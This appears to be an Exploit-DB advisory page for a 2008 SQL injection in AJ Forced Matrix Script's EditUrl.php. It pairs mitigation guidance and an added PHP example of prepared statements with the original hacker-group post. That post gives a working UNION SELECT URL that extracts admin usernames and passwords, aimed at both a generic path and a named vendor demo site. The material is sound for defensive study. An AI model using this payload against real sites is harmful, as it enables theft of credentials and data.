Vendor: AJ Forced Matrix Script
By: yassine_enp
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: AJ Forced Matrix Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AJ Forced Matrix Script Remote SQL Injection Vulnerability

AJ Forced Matrix Script is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data does not get passed to the SQL server. All input data should be validated and filtered, and all SQL queries should use parameterized statements.
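
The mitigation above, as an added example that is not part of the original advisory or the vendor's code: the `url` parameter of EditUrl.php is validated as a positive integer and then bound in a prepared statement. The `feeds` table, its columns and the function names are assumptions, since the product's real schema is not shown on this page.

```php
<?php
declare(strict_types=1);

// Added example. Table/column names (feeds, id, title, link) and function
// names are assumptions, not the product's real schema. Requires PHP 8+.

/** Validate the `url` request parameter as a positive integer id, else null. */
function parseFeedId(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (url[]=...) and missing values are rejected
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up one row with a bound parameter; the id is never concatenated into SQL. */
function findFeed(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title, link FROM feeds WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE feeds (id INTEGER PRIMARY KEY, title TEXT, link TEXT)');
$db->exec("INSERT INTO feeds (title, link) VALUES ('Example feed', 'https://example.com/rss')");

// Constructed inputs: a valid id, the string from this advisory as it arrives
// after URL decoding ("+" becomes a space), a non-numeric value, and an empty value.
$inputs = ['1', '-7 union select 1,password,3,username from admin--', 'abc', ''];
foreach ($inputs as $raw) {
    $id = parseFeedId($raw);
    if ($id === null) {
        echo 'rejected: ' . json_encode($raw) . "\n"; // HTTP 400 in a real handler
        continue;
    }
    $row = findFeed($db, $id);
    echo "id $id -> " . ($row === null ? 'not found' : $row['title']) . "\n";
}
```

Validation and binding are independent layers: the integer check rejects malformed input early, and the bound parameter keeps the query structure fixed even if a validation rule is later loosened.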

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: e1np@hotmail.com:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
                =               nome de script :rss_reader
                                                                     =
                ======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--

Demo
________

http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--


                                
                                                    

===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::e1np@Hotmail.CoM::::

# milw0rm.com [2008-10-24]